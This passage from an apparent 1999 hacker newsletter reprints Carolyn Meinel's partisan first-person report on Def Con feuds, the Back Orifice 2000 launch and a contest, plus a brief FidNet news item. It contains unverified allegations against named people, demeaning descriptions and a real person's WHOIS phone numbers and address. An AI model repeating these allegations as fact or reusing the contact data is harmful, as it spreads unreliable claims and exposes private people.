  4911.       Anyhow, Netmask and I had spoken once on the phone, or perhaps I
  4912.       should say, had spoken once that he had admitted to being Netmask. His
  4913.       erotic fantasies remind me of the man, or group, that has done major
  4914.       damage to almost every Internet Service Provider I had ever used:
  4915.       GALF. NetmaskÆs Web site -- 303.org -- features pictures of his 303
  4916.       gang mowing down aspen trees with machine guns, dancing around a
  4917.       table covered with exotic guns, firebombing a car, and at one time it
  4918.       included instructions that presumably were meant as a humorous parody
  4919.       on instructions on how to molest children (under cocksoldier.com, hosted
  4920.       on the same box). They live near the Columbine school district near
  4921.       Denver. 
  4922.  
  4923.       Netmask runs the kind of gang that could make reporters go nuts for a
  4924.       chance to interview him. I can see the headline, ôGoth gun and bomb nut
  4925.       hackers run rampant in Columbine school district.ö But I will resist the
  4926.       temptation to write lurid stuff about them, just check out
  4927.       http://www.303.org for yourself, if it is still up.
  4928.  
  4929.       Just before Def Con, Netmask had emailed me, ôYou up for a little
  4930.       hacker death match with me on friday? (at con)ö
  4931.  
  4932.       I replied, ôSure on death match, if you'll talk with me afterward. My aim
  4933.       might be off, I'm used to beating up outlaw horses with well-aimed
  4934.       kicks, the half ton class opponent is kinda exhilarating. Haven't sparred
  4935.       with a human in a long time. Dunno why humans are afraid of me :):)ö I
  4936.       was just kidding, I swear! I just give wild horses ôlove tapsö when they
  4937.       attack me, is all.
  4938.  
  4939.       Hacker Death Match. That consists of putting on bulky foam rubber
  4940.       ôsumo suitsö and trying to knock each other down or out of the ring.
  4941.       Netmask had emailed back, ôIm gonna pass on this actually.... Keeps
  4942.       me out of the media.. and keeps you less in the media..ö
  4943.  
  4944.       Just now I am wearing karate shoes. ItÆs my Deadly Granny outfit.
  4945.       Make muggers quake in their boots when they see me. Netmask is
  4946.       staring at them. The karate shoes, I mean. His martial art is kick boxing.
  4947.       He looks up. We stare at each other awhile. Then I lean forward within
  4948.       six inches of his face and whisper, ôThe reason I respect you, is you
  4949.       arenÆt a crybaby like the others.ö
  4950.  
  4951.       He ducks and rushes off. 
  4952.  
  4953.       ###
  4954.  
  4955.       Two PM. I had gotten press credentials earlier that day from an elderly
  4956.       oriental man so I could get into the front row with a tape recorder to
  4957.       cover the Cult of the Dead Cow. They are about to introduce their new
  4958.       program to enable people to break into computers: Back Orifice 2000.
  4959.       Priest gets up on stage to announce their imminent arrival. A voice
  4960.       shouts out, ôThere have been a lot of naked people here. IsnÆt that
  4961.       against the law?ö
  4962.  
  4963.       Priest laughs. ôThis is Las Vegas.ö
  4964.       Another voice shouts, ôWhat happens to the people who are running
  4965.       around naked?ö
  4966.       Priest points at him. ôThey get laid!ö
  4967.       The audience roars with laughter. 
  4968.  
  4969.       Priest continues, ôWe have a treat for you tonight, live rock music.ö
  4970.       Priest leaves the stage to cheers.
  4971.  
  4972.       The lights dim, then go out. From big speakers on stage come sounds of
  4973.       a storm, mooing of cows and an adult voice ordering a kid over and over
  4974.       again to put the cows in the barn. The mooing gradually grows ominous,
  4975.       then ridiculously loud. 
  4976.  
  4977.       Rock music breaks out as two spotlights shine on each side of the stage.
  4978.       They project the logo of the Cult of the Dead Cow -- a cow skull in
  4979.       black against a white cross. The logos rotate. In the center of the stage
  4980.       a video projects themes of cattle interspersed with intimidating images
  4981.       from Nazi and Maoist social realistic art. Then, to cheers, the Cult of the
  4982.       Dead Cow gang enters from right stage, hurling glowing disks out to the
  4983.       audience. Nineteen of the twenty cult members prance, slouch and/or
  4984.       stagger up on stage. In front of them, their master of ceremonies leaps
  4985.       about in a ratty white fur coat, synthetic fur chaps, a belt made of
  4986.       handcuffs, doing a sick parody of a Pentecostal preacher, grabbing his
  4987.       crotch, making obscene jokes, and leading the audience in chants of
  4988.       (him)ôDead!ö (audience) ôCow! (him) ôKiss! (audience) ôAss!ö The
  4989.       rising lights reveal a parody of church vestments, banners with a
  4990.       Christian cross with the dead cow symbol in the center hanging on each
  4991.       side of the stage.
  4992.  
  4993.       He raises both hands over his head, palms toward the audience. ôEvery
  4994.       eight year old can hack shit! Hacking to save the world! Just donÆt get
  4995.       fucking busted! And use a fucking spell checker!ö Long cheering and
  4996.       laughter come from the crowd.
  4997.  
  4998.       ôAnd now, the man who wrote Back Orifice 2000 -- Dildog!ö 
  4999.  
  5000.       Dildog describes the features as if it is merely a ôremote administration
  5001.       toolö as he calls it, raising snickers from the crowd. He uses LCD
  5002.       projectors from both a ôclientö (attacker) and ôserverö (victim)
  5003.       computer to show how BO2000 hides itself. When he shows the option
  5004.       to disable the victim mouse and keyboard and allow the attackerÆs
  5005.       mouse and keyboard to control the victim, the crowd cheers.
  5006.  
  5007.       They end the show with a man in red lace tights, shorts and red pasties
  5008.       held on with duct tape (who looks like a near terminal AIDS victim)
  5009.       shimmying across the stage while Deth Vegetable -- a gigantic
  5010.       sumo-style man in shorts -- smashes computers and a monitor with an
  5011.       electric guitar, the Master of Ceremonies waving his hands and
  5012.       screaming as he fires roman candles from a tube he clenches with his
  5013.       thighs against his crotch.
  5014.  
  5015.       Afterwards I go back to the press room to check for schedule changes.
  5016.       Somehow I have the premonition that Brian MartinÆs talk ôfakes walk
  5017.       among usö may be rescheduled. David Akin of the Canadian publication
  5018.       ôNational Postö approaches me as I am leaving and asks ôWhy do so
  5019.       many hackers hate you? They wonÆt tell me anything specific. Basically
  5020.       they just say æCarolyn sucks.Æö 
  5021.  
  5022.       Just then a disheveled man in an Attrition.org black T-shirt strides up
  5023.       yelling, ôGet out of here. Only press are allowed here.ö
  5024.       ôI have a press pass.ö I show it to him.
  5025.       ôYou arenÆt a legitimate reporter! Get out of here.ö
  5026.       ôHow many FUCKing hundreds of magazine articles do I have to write
  5027.       before you admit I am a reporter?ö Oops, I said a bad word. IÆm
  5028.       mortified.
  5029.       ôWeÆll consider you a reporter when you write real information!ö
  5030.       ôReal information! Your Attrition.org site is full of libel!ö
  5031.  
  5032.       Just then the woman in charge of the press room, followed by several
  5033.       reporters, comes out and yells at me, ôThe conference staff says you
  5034.       are not a reporter. Give back your press pass. Now.ö
  5035.  
  5036.       Akin turns to them, ôYou canÆt do this! You canÆt pull a reporterÆs
  5037.       credentials just because you donÆt like what he or she writes!ö
  5038.  
  5039.       Somehow Priest materializes. ôCome with me, I have some information
  5040.       for you.ö We go into a deserted room. Chairs are stacked high. I canÆt
  5041.       believe I am actually thinking this, but the first thing that comes to mind
  5042.       is that this will make a great scene for the ôGranny Hacker Sticks it to
  5043.       the FBIö movie.
  5044.  
  5045.       Priest breaks the spell. ôThe press room incident. It never happened.ö
  5046.       ôWhat?ö
  5047.       ôWe are explaining it to the reporters. They understand it was no big
  5048.       deal. You will never speak of this incident again.ö
  5049.       ôNo way.ö
  5050.  
  5051.       Puzzlement flashes across his face. He must be realizing that his
  5052.       nondisclosure agreement ploy has failed. ôIf you talk to a reporter about
  5053.       this, I will throw you out of the con. You *will* tell them it never
  5054.       happened.ö
  5055.  
  5056.       ôOne problem. I donÆt lie.ö I begin to tremble. ôI ... have ... my ...
  5057.       integrity.ö Priest rubs his chin. I glare at him. He takes a deep breath.
  5058.       Time for a different ploy. ôYou donÆt have to worry about Attrition.org.
  5059.       We have discredited them with the media. Brian Martin is on his way
  5060.       out.ö
  5061.  
  5062.       I look at him, head tilted, puzzled.
  5063.       ôA few months ago Brian Martin tried to get me fired.ö
  5064.       ôUh, huh.ö
  5065.       ôWe were talking on Internet Relay Chat. On condition of
  5066.       confidentiality. He sent a transcript of the conversation to my boss. Got
  5067.       me in major trouble.ö
  5068.       ôAll he did was violate confidentiality? Sheesh, he didnÆt alter the
  5069.       transcript?ö
  5070.       ôHe altered the transcript. Fortunately I had my version burned into a
  5071.       CD-ROM. Also, two others had eavesdropped on our chat and burned
  5072.       their transcripts to CD-ROM, too. Ours all agreed.ö
  5073.  
  5074.       I nodded. Yeah, right. How come there are always so many fantastic
  5075.       stories revolving around Brian Martin and Attrition.org? We ought to
  5076.       nominate attrition.org for a Hugo award at the next World Science
  5077.       Fiction Convention. Or is Priest the one who deserves the Hugo? Priest
  5078.       continues. ôI want Martin behind bars. You know he was busted for the
  5079.       New York Times hack. Then immediately released. HeÆs now an
  5080.       unpaid informant.ö
  5081.  
  5082.       I let out a long breath. If Priest is telling the truth -- a BIG assumption --
  5083.       Martin is now too valuable for the agency to expend. ôIÆve heard that
  5084.       Martin is ops (moderator) on three Global Hell IRC channels. So was he
  5085.       the one who got Zyklon busted for the White House hack?ö
  5086.  
  5087.       Priest shrugs.
  5088.       ôIs he informing on Global Hell?ö
  5089.       He throws up his hands. ôWe have so much on our plates we canÆt even
  5090.       pay attention to Global Hell.ö
  5091.       ôBut they claim to be the ones hacking so many of those government
  5092.       Web sites.ö
  5093.       ôYou have no idea of what we are contending with.ö
  5094.  
  5095.       Internet startup. Get rich. Yeah, right, I hate it when people forget to
  5096.       stick to their stories. I reply, ôI have a problem with your informant. I
  5097.       had to shut down our Happy Hacker IRC server when Martin got on it.
  5098.       It is my opinion that he may have been encouraging kids to commit
  5099.       crime. I am not operating a breeding ground for crime. IÆm not going to
  5100.       bring Happy Hacker IRC back up until I get a more reliable group of
  5101.       moderators.ö
  5102.  
  5103.       ôContributing to the delinquency of minors is a crime. Bring your IRC
  5104.       server back up and we can get Martin behind bars.ö
  5105.       ôHow?ö
  5106.       ôYour network is located in Texas. Under Texas state law, even though
  5107.       Martin and any kid he involves in crime are both out of state, if
  5108.       discussions about committing a crime happened on a computer within
  5109.       Texas, thatÆs conspiracy. TheyÆll extradite both parties.ö
  5110.       ôI canÆt do that. I will not expend some teenager to put Martin behind
  5111.       bars. I will not bring up our IRC server until I can make sure we can
  5112.       keep the criminals off.ö And, I thought, not until we can keep FBI agent
  5113.       provocateurs out.
  5114.       ôSo, am I going to have to kick you out of the conference?ö
  5115.       ôMy publisher would be overjoyed. Great publicity. Believe it or not, two
  5116.       independent groups have approached me about doing a movie. Getting
  5117.       kicked out would be a GREAT dramatic device.ö Oh, man, I can almost
  5118.       taste the Granny Hacker from Heck movie!
  5119.       ôBut what do you want?ö
  5120.       ôI want to stay. I want to see if Fangz can win the Bastard Operator
  5121.       from Hell contest. But even if it does, I presume the conference
  5122.       organizers will come up with an excuse to deny us the prize.ö
  5123.       ôYes, but at least you will know you won.ö
  5124.  
  5125.       When I return to the game, I see someone at the console of Fangz.
  5126.       ôExcuse me, thatÆs my computer. The rules say you have to hack it
  5127.       remotely, not from console.ö
  5128.  
  5129.       ôI was just checking to see whether it was broken.ö He goes back to
  5130.       messing with the console of the computer next to Fangz, his entry in the
  5131.       Bastard Operator from Hell contest. A fat man with disheveled black
  5132.       hair and ragged beard and sloppy clothes joins him. The disheveled man
  5133.       slides a CD-ROM into the drive. They are violating the rules by
  5134.       changing their operating system. Again.
  5135.  
  5136.       A little later I see Priest walking by. I run over and hail him. ôExcuse
  5137.       me, what is your real name?ö
  5138.  
  5139.       He pauses in mid stride, looking so off balance I wonder if he might fall.
  5140.       His mouth flaps open and shut. Finally he sputters, ôYou must be
  5141.       kidding.ö 
  5142.       ôI thought it was worth a try.ö
  5143.  
  5144.       He falls back into his fast stride and disappears into the crowd. Poor
  5145.       Priest, he doesnÆt realize yet that he has just persuaded an investigative
  5146.       reporter, yes, the Granny Reporter from Heck, to learn everything she
  5147.       can about him, stuff like his .bash_history (real hackers use tcsh) and
  5148.       maybe even his real name.
  5149.  
  5150.       ###
  5151.  
  5152.       To be continued: JonÆs lightning reflexes keep Joltcan.c exploit from
  5153.       DOSing Fangz; Michael Schiffman beefs up his muscles with a bicycle
  5154.       pump; fat guy who keeps on changing the operating system for his
  5155.       BOFH entry howls with rage about how mean and nasty Fangz is when
  5156.       people try to break in (recorded in real-audio, to be available from this
  5157.       web site); Granny Hacker from Heck gets into trouble, but a giant
  5158.       Texan interior decorator rescues her.
  5159.  
  5160.  
  5161.  
  5162.       Granny Hacker Visits Def Con - Part 3 
  5163.       Thursday, July 22, 1999 at 0:01:12
  5164.       by Carolyn Meinel - Writing For AntiOnline 
  5165.  
  5166.       Saturday, July 10, 1999. After dinner, I return to take a turn guarding
  5167.       Fangz. Jon points to a stain on the linen covering the table where Fangz
  5168.       sits. ôSomeone tried to kill it by pouring a can of Jolt at the keyboard.
  5169.       Also, the power has been turned off four times since you left. They are
  5170.       getting ugly.ö He laughs. ôI let someone reboot into single user mode as
  5171.       root. He changed the root password to æcrackwhore.Æ He was pissed
  5172.       when he rebooted and couldnÆt get into root over the network.ö
  5173.  
  5174.       Oh, yes, I knew what that was all about. He had set it up so root from
  5175.       console couldnÆt write to the password file. We both snicker. Then I
  5176.       grow sober thinking of the hazards of people frequently turning off our
  5177.       power. The operating system we use can sometimes be destroyed if the
  5178.       power goes off while a file is being written to the disk. Kernel panic!
  5179.  
  5180.       Some hackers gather around me talking about the latest Web site hacks.
  5181.       They say the Defcon.org site is down because someone defaced it with
  5182.       parodies of the Antionline and Happy Hacker web sites. I didnÆt do it!
  5183.       Honest! Um, John, what about you?
  5184.  
  5185.       They have an even better story about why MartinÆs Attrition.org site is
  5186.       down for Def Con. Somehow the title of the index.html page changed to
  5187.       ôTemple of Hate.ö ThatÆs what AntionlineÆs John Vranesevich and I
  5188.       like to call it. Then, mysteriously, just after it sprouted the ôTemple of
  5189.       Hateö slogan, Attrition.org went down.
  5190.  
  5191.       (Later Martin explained that his webmaster had changed the name on
  5192.       purpose, that it wasnÆt hacked, honest! And, just by coincidence, a hard
  5193.       drive failed right after the ôTemple of Hateö headline went up. Just by
  5194.       coincidence, as soon as they got Attrition.org up again, they decided to
  5195.       change the headline to ôWe are the people our parents warned us
  5196.       about.ö I didnÆt do it! I swear! Repeat after me, ôHacking Web sites is
  5197.       childish.ö Besides, why would I hack my own publicist?)
  5198.  
  5199.       At fifteen minutes before 10 PM, Priest comes in to shut down the
  5200.       room. ôYou. Out. Now.ö Hackers meekly file to the doors.
  5201.  
  5202.       I go to my hotel room at the Hard Rock hotel across the street, and
  5203.       change into a short red velvet dress and black tights. This is for the
  5204.       formal ôBlack and Whiteö ball, then sashay back to the Alexis hotel. IÆm
  5205.       glamorous granny now, honest!
  5206.  
  5207.       In the lobby, two of the Trumpbour brothers greet me. They thank me
  5208.       for bringing our Happy Hacker Wargame team and some computers to
  5209.       their Summercon hacker gathering a month previously. ôDef Con has a
  5210.       bad atmosphere. We like to keep our con pleasant.ö 
  5211.  
  5212.       I thank them for keeping alive the ideal of true hacking. Folks, if you go
  5213.       to just one hacker con next year, try Summer Con. It's run by real
  5214.       hackers, people who use their real names, not a bunch of fictitious
  5215.       characters such as Priest. Speak of the devil, Priest walks by just now
  5216.       dressed like a priest. I flash him my winningest smile, but he acts like he
  5217.       doesnÆt see me.
  5218.  
  5219.       I begin walking through the lobby toward the Def Con ballroom. A voice
  5220.       behind me yells, ôCarolyn! Why did you tell the FBI that I hacked the
  5221.       New York Times?ö 
  5222.  
  5223.       I turn and see a man so muscular that he looks like a bicycle pump has
  5224.       inflated him. By contrast, his narrow head sits on a skinny neck. He is
  5225.       wearing a tank top that shows off his tattoos. His muscles quiver with
  5226.       what I suspect might be rage. Behind and beside him is a crowd of kids
  5227.       that look like they average fourteen years of age. They goggle at us like
  5228.       spectators at a bull fight.
  5229.  
  5230.       I scan the group. I donÆt recognize any of them. ôExcuse me, but I donÆt
  5231.       believe we have met.ö
  5232.  
  5233.       Mr. Steroids says, ôWe have met. Several times. Think.ö
  5234.  
  5235.       I scratch my head, rub my chin. I simply canÆt think of having ever met
  5236.       anyone who gives the impression of being seriously pumped on steroids.
  5237.       I study his face. Steroids shouldnÆt change that too much. Still doesnÆt
  5238.       ring a bell. ôGive me a hint.ö
  5239.  
  5240.       ôYou know me. You told the FBI I hacked the New York Times.ö
  5241.  
  5242.       I wonder if the FBI had tried to force him to become an informant. Did
  5243.       some agents do to him exactly what they did to me, claiming to have
  5244.       evidence that they really didnÆt have? When they came after me for
  5245.       supposedly hacking the New York Times, I had told them to, um
  5246.       ôfwordö themselves. Seriously, I am against computer crime and am
  5247.       happy to help the FBI catch criminals. But I refuse to be an undercover
  5248.       informant and I oppose the use of undercover informants. 
  5249.  
  5250.       OK, time for major soapbox speech here. IMNSHO, our taxpayer
  5251.       money should not fund the FBI to run around encouraging computer
  5252.       crime all in the name of some undercover operation. But, then, maybe
  5253.       IÆm just paranoid. Maybe the FBI doesn't run Def Con. Maybe it is
  5254.       mere coincidence that Jeff Moss, who bills himself as the man who
  5255.       owns the Def Con conferences, is a full-time employee of Secure
  5256.       Computing, Inc. To be exact, the registration for Defcon.org reads: 
  5257.  
  5258.       DEF CON (DEFCON-DOM)
  5259.       2709 E. Madison
  5260.       Seattle, WA 98112
  5261.  
  5262.       Domain Name: DEFCON.ORG
  5263.  
  5264.       Administrative Contact, Technical Contact, Zone Contact:
  5265.       Moss, Jeff (JM27) jm@DEFCON.ORG
  5266.       206-626-2526 (FAX) 206-453-9567
  5267.       Billing Contact:
  5268.       Moss, Jeff (JM27) jm@DEFCON.ORG
  5269.       206-626-2526 (FAX) 206-453-9567
  5270.  
  5271.       Maybe it is coincidence that the Secure Computing web site claims that
  5272.       it ôis the market share leader in providing network perimeter security to
  5273.       the U.S. Federal government.ö
  5274.       (http://www.securecomputing.com/C_Bg_Hist_FRS.html) Maybe the
  5275.       whole Priest thing is just a guy having mostly harmless Vogon fun by
  5276.       being a fictitious FBI agent.
  5277.  
  5278.       IÆm wondering if the FBI really had told Mr. Steroids I had provided
  5279.       evidence against him. Is this how their Quantico academy teaches FBI
  5280.       agents to nullify recalcitrant reporters? Run around questioning, raiding
  5281.       and arresting people and telling them I provided the evidence? For once
  5282.       IÆm dead serious here. Besides Mr. Steroids, Pete Shipley and his
  5283.       dis.org gangmates Ph0n-E and Cyber say the FBI has questioned them
  5284.       at length about allegations the FBI claimed I had made against them. Do
  5285.       you know what it feels like to have weird looking guys trembling with
  5286.       anger accusing me of getting them in trouble with the FBI? But then
  5287.       again, maybe the FBI isnÆt doing anything of the sort and all these guys
  5288.       are just making up these stories.
  5289.  
  5290.       Anyhow, youÆre tired of my rant, so letÆs get back to the story. Serious
  5291.       mode off. Humor mode on. 
  5292.  
  5293.       Steroids reaches into his jeans pocket and pulls out a battered wallet.
  5294.       ôOK, IÆll give you a hint. Look at this.ö He shows me his driverÆs
  5295.       license, trembling in his hand. It says ôMichael Schiffman.ö His buddies
  5296.       draw closer, menacing. Er, as menacing as a gaggle of 13 through 15
  5297.       year olds can get. Darn, IÆm not wearing my karate shoes. They are
  5298.       staring at my 38 D bosom instead.
  5299.  
  5300.       I put on my best politician smile. ôMichael Schiffman, nice to meet you!ö
  5301.       Now I know who he is, a man better known as ôRouteö or ôDaemon9.ö
  5302.       He got mad at me long ago when I told my Happy Hacker mailing list
  5303.       that I opposed his hacker ezine, ôPhrack.ö In my opinion, he encourages
  5304.       people to commit senseless digital vandalism.
  5305.  
  5306.       ôWhy did you tell the FBI that Modify and I hacked the New York
  5307.       Times?ö
  5308.  
  5309.       I thought fast. I could remember telling the FBIÆs Tracy Baldwin that it
  5310.       was my opinion that there was only a 2% chance that Michael
  5311.       Schiffman could have been part of Hacking for Girliez. I had thought
  5312.       that was my way of debunking the idea he was involved. I figure it
  5313.       wonÆt do any good to tell him about the 2% bit, heÆs too mad to grasp
  5314.       nuances just now. 
  5315.  
  5316.       I reply, ôThe FBI told me that *I* hacked the New York Times.ö
  5317.  
  5318.       Schiffman puffs out a breath. He looks like an impatient school teacher
  5319.       waiting for a slow student to get the right answer. OK, a psychotic
  5320.       teacher with steroid poisoning. HeÆs shaking. ôWhy did you tell them we
  5321.       did it?ö
  5322.  
  5323.       ôModify hack the New York Times? Now thatÆs ridiculous. Why would
  5324.       I say that to the FBI? He couldnÆt hack his way out of a paper bag.ö
  5325.  
  5326.       Schiffman and company begin shouting, ôModify can so hack,ö ôCrack
  5327.       whore,ö and other brilliant intellectual observations. 
  5328.  
  5329.       I brilliantly retort, ôI donÆt have to listen to this.ö Would they jump me?
  5330.       Was I about to be mobbed by children while not wearing karate shoes? I
  5331.       figure I am safer acting like they could not be any threat than by taking
  5332.       a martial arts defensive stance. 
  5333.  
  5334.       I turn on my heel and walk away.. 
  5335.  
  5336.       I enter the main ballroom at midnight -- time for Hacker Jeopardy to
  5337.       start. This is a takeoff on the TV quiz show, ôJeopardy.ö To get to the
  5338.       empty seats on the far side of the ballroom, I walk around the back. In
  5339.       the middle of the back row I see a familiar face: Modify and three
  5340.       others are standing on their chairs. Are they trying to be noticed? As I
  5341.       pass them, Modify hands me a business card reading ôAttrition.org --
  5342.       We donÆt play well with others.ö Oh, yes, isnÆt that a line from the
  5343.       movie ôHackersö? Does this mean they are trying to get a movie deal,
  5344.       too, something like ôHow Attrition.org Stuck it to Priest (whoever the
  5345.       heck he is)ö? The guy standing on the chair next to Modify hisses at me,
  5346.       ôYouÆd better watch out.ö
  5347.  
  5348.       I stop to look over the guy who hissed at me. Yes, it must be Brian
  5349.       Martin. It has to be. He is standing next to Modify, his bosom buddy.
  5350.       But Martin, once buff, showing off his muscles with a tight T-shirt at
  5351.       previous Def Cons, has wasted away. HeÆs downright skinny now.
  5352.       Some two inches of his hairline has balded. The man is only 25 or 26, I
  5353.       think. Are those wrinkles on that sagging, emaciated face? Is that a
  5354.       stoop to his shoulders? The pressure of being my publicist, dealing with
  5355.       that non-hack of his attrition.org web site, and PriestÆs attempts to brand
  5356.       him a narc and discredit him with journalists must be wearing him down.
  5357.  
  5358.       Priest tromps up on stage. ôIs there anyone who needs to do anything
  5359.       before the game starts?ö
  5360.  
  5361.       A transvestite prances up to Priest, clad in a tiny sheath evening dress.
  5362.       Someone throws the girlie a condom. S/He lifts his/her skirt to reveal a
  5363.       red sequined jock strap that appears to be rather full, and inserts the
  5364.       condom in it. S/He wriggles off stage, a pied piper leading a gaggle of
  5365.       boys out of the ballroom.
  5366.  
  5367.       ###
  5368.  
  5369.       Sunday morning some dazed-looking guys are lounging by the pool. One
  5370.       is the fellow who is managing the entry in the Bastard Operator from
  5371.       Hell contest that sits to the right of Fangz. I walk over and give him a
  5372.       cheery hello. He and his comrades start howling, ôYour computer is
  5373.       stupid. ItÆs broken. It sucks.ö
  5374.  
  5375.       I ask, ôWhy?ö
  5376.       ôBecause itÆs yours.ö 
  5377.       ôBecause the C compiler is broken.ö
  5378.       I say, ôOther people have compiled programs on it. Why canÆt you?ö
  5379.       ôBecause they fixed the compiler.ö
  5380.       I say, ôThatÆs called hacking.ö
  5381.  
  5382.       ###
  5383.  
  5384.       Later that morning, there is great cheering as the Ghetto Hackers break
  5385.       into one computer, then another, then get ôhalf a hackö on a third. At 1
  5386.       PM the game is called to a close. Ghetto Hackers have won the
  5387.       ôCapture the Flagö part of the contest. Of the remaining nine computers,
  5388.       the winner in the Bastard Operator from Hell is, in theory, to be
  5389.       awarded to whomever had been running the most services. That, I hope,
  5390.       means Fangz. I notice a crowd gathering. Priest is there. I ask him, ôIs it
  5391.       OK to take down our equipment now?ö He nods. Jon and I began taking
  5392.       the system apart, unplugging the Ethernet hub, power, etc. 
  5393.  
  5394.       A kid from the Penguin Palace booth comes over and begins
  5395.       interviewing me on tape. ôCarolyn, your box finished the game without
  5396.       being rooted. Does this mean youÆre elite?ö
  5397.       ôNo, it just means Fangz didnÆt get rooted.ö
  5398.  
  5399.       The fat, disheveled guy with the box next to Fangz begins shouting,
  5400.       ôYou didnÆt get rooted because the hackers here are no good. They
  5401.       didnÆt root my box and it had plenty of holes.ö
  5402.  
  5403.       I reply, ôYou mean the Ghetto Hackers are no good? ThatÆs not a fair
  5404.       comparison, you kept on changing your operating system from console.ö
  5405.  
  5406.       ôI cheated? I had FreeBSD on it for twelve hours! People did so have
  5407.       plenty of time to try to break in!ö
  5408.  
  5409.       ôAre you saying the Ghetto Hackers are no good?ö
  5410.  
  5411.       He rubs his chin, thinking this one over. As I watch him, I suddenly
  5412.       realize who he is. Bluto, from the Popeye cartoons. Aha, I have pierced
  5413.       yet another hacker identity. Finally Bluto looks me in the eye and yells,
  5414.       ôYou cheated! Your box broke the rules! You have to be able to
  5415.       remotely administer it! ThatÆs the rules of the game!ö
  5416.  
  5417.       I look bewildered. ôWait, I distinctly heard them say you are *allowed*
  5418.       to administer it remotely, and forbidden to administer it from the console.
  5419.       They didnÆt say we were *required* to do remote administration.ö
  5420.  
  5421.       I realize a crowd has gathered. Shipley is among them. Bad sign. A
  5422.       skyscraper of a man looms to my right. ItÆs the giant Texan interior
  5423.       decorator. He holds a keyboard menacingly in his right hand, staring
  5424.       down Bluto. Good sign.
  5425.  
  5426.       Bluto yells again, ôCan you remotely administer this box? Answer me
  5427.       now!ö
  5428.       ôWell, um, er, it doesnÆt have secure shell, we have to telnet in to do
  5429.       anything.ö IÆm embarrassed.
  5430.       ôProve it! Create an account now!ö
  5431.       ôBut we just took the system down...ö
  5432.       ôProve it! Prove it!ö 
  5433.  
  5434.       Priest looms behind Bluto. HeÆs staring into my eyes. ôThatÆs it,
  5435.       Carolyn. We just used up our last chit at this hotel. Last night some
  5436.       fucking idiot tried to steal their golf cart. One more incident and they
  5437.       close down the con. You. Out. Now.ö
  5438.  
  5439.       I can hardly hear Priest for the shouting of Bluto, who is leaning awfully
  5440.       close and waving his arms. I make out strangled sounds like ônon RFC
  5441.       services ... broken C libraries...ö The Penguin Palace kid is still tape
  5442.       recording. The giant Texan interior decorator is still leaning over the
  5443.       table wielding FangzÆ keyboard like a weapon, in the face of Bluto. I
  5444.       hear a voice shouting, ôItÆs not fair, she isnÆt causing the disruption.ö
  5445.  
  5446.       Priest hisses at the kid with the recorder, ôIf you publish it, IÆll sue you.ö
  5447.       Then he stares at me. ôYou. Out. Now.ö
  5448.  
  5449.       I get this sinking feeling. ôDoes this mean otherwise you will strap us
  5450.       into chairs to listen to your Vogon poetry?ö
  5451.  
  5452.       A guy in a Def Con Goon shirt hisses, ôResistance is futile.ö
  5453.  
  5454.       PriestÆs eyes glaze over as he recites, ôOr I will rend thee in the
  5455.       #dc-stuff channel, see if I donÆt!ö
  5456.       My mind comes up with a ôdonÆt panicö scenario. ôActually I quite like
  5457.       your poetry.ö
  5458.       PriestÆs mouth flaps open and shut. ôYou do? Tell me more.ö
  5459.       ôEr, ... interesting rhythmic devices...ö
  5460.  
  5461.       The giant Texan interior decorator springs to my defense.
  5462.       ôCounterpoints ... the surrealism of the underlying metaphor...ö
  5463.  
  5464.       A dreamy smile softens the lumpy surface of PriestÆs face. ôSo what
  5465.       youÆre saying is I write poetry because underneath my mean callous
  5466.       heartless exterior I really just want to be loved?ö
  5467.  
  5468.       ôYes, yes!ö the giant Texan interior decorator and I urge him.
  5469.       ôNo, well, youÆre both completely wrong, I just write poetry to throw my
  5470.       mean callous heartless exterior into sharp relief. You. Out. Now.ö
  5471.       As we exit the hotel, walking by the pool, Priest trots up and tries to
  5472.       draw me aside. ôWe need to speak privately.ö
  5473.       I think for a minute. Maybe he has reconsidered. Maybe he just wants
  5474.       me to sign that nondisclosure agreement after all and make me rich. Or
  5475.       could it be, shudder, more Vogon poetry? I gesture at Jon and the giant
  5476.       Texan interior decorator. ôWe can speak with them here.ö 
  5477.       ôNo, this is private.ö
  5478.       ôThen we canÆt talk.ö
  5479.  
  5480.       Jon, the giant Texan interior decorator and I pile into our rental car
  5481.       which the Happy Hacker Godfather has managed to materialize. Shipley
  5482.       is leaning into the window to snap one last picture of me. His lips part in
  5483.       a snarl. No fangs. I flash him a smile.
  5484.  
  5485.       Postscript: Just as I had anticipated, Priest rescheduled Brian MartinÆs
  5486.       ôFakes Walk Among USö talk. To be exact, he rescheduled it to
  5487.       dev/null (ôdevice nullö for you non-Unix wizards). Martin refused to
  5488.       take the affront passively. He gathered a handful of people by the pool
  5489.       side to recount his stories about AntionlineÆs John Vranesevich and me.
  5490.       He may win this yearÆs Hugo yet.
  5491.  
  5492.       Want to find out why fictitious characters variously claiming to be with
  5493.       the FBI or a hot Internet startup recite Vogon poetry at me? See
  5494.       http://happyhacker.org for our ômostly harmlessö instructions on how to
  5495.       break into computers. Happy hacking, and watch out for us grannies
  5496.       from heck! Oh, I almost forgot. Buy my book, The Happy Hacker: A
  5497.       Guide to Mostly Harmless Computer Hacking. Resistance is futile.
  5498.  
  5499.       Granny Hacker vs. "Bluto" via RealAudio:
  5500.  
  5501.       The Granny Hacker From Heck and "Bluto" go head to head by the
  5502.       pool:
  5503.  
  5504.       http://www.antionline.com/RealMedia/CarolynvsBluto.ram
  5505.       
  5506.       Granny Hacker From Heck Book Plug:
  5507.  
  5508.       Does your local bookstore say they have to special order The Happy
  5509.       Hacker? You don't want to wait several weeks to get it through
  5510.       Amazon.com? You can get the book fast for only $35. For US
  5511.       customers, this will include Priority 2nd day delivery. Send your check of
  5512.       money order for $34.95 (this includes shipping and handling) made out to
  5513.       Happy Hacker, 4 Fawn Rd., Cedar Crest NM 87008.
  5514.  
  5515.  
  5516.       @HWA 
  5517.  
  5518. 33.0 FidNet Causing Massive Confusion 
  5519.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5520.       
  5521.       From HNN http://www.hackernews.com/
  5522.  
  5523.  
  5524.       contributed by Space Rogue 
  5525.       There seems to be a lot of confusion around this new
  5526.       plan, proposal, draft or whatever it is regarding FidNet.
  5527.       This new Federal Intrusion Detection Network is
  5528.       designed to protect the nation's infrastructure from
  5529.       cyber attack. HNN has only been able to find parts of
  5530.       the document and have not read all 170 pages of it but
  5531.       from what we have found this network would actually
  5532.       be run by the GSA and not the FBI, it would only
  5533.       monitor government owned systems, and there is a
  5534.       provision for privacy concerns. This document is not
  5535.       finalized nor has it been officially released, until then
  5536.       this plan needs to be closely watched. (At least the
  5537.       government is doing something other than executing
  5538.       stupid search warrants.) 
  5539.  
  5540.       Center For Democracy & Technology - Contains Transcripts of Parts of the Report
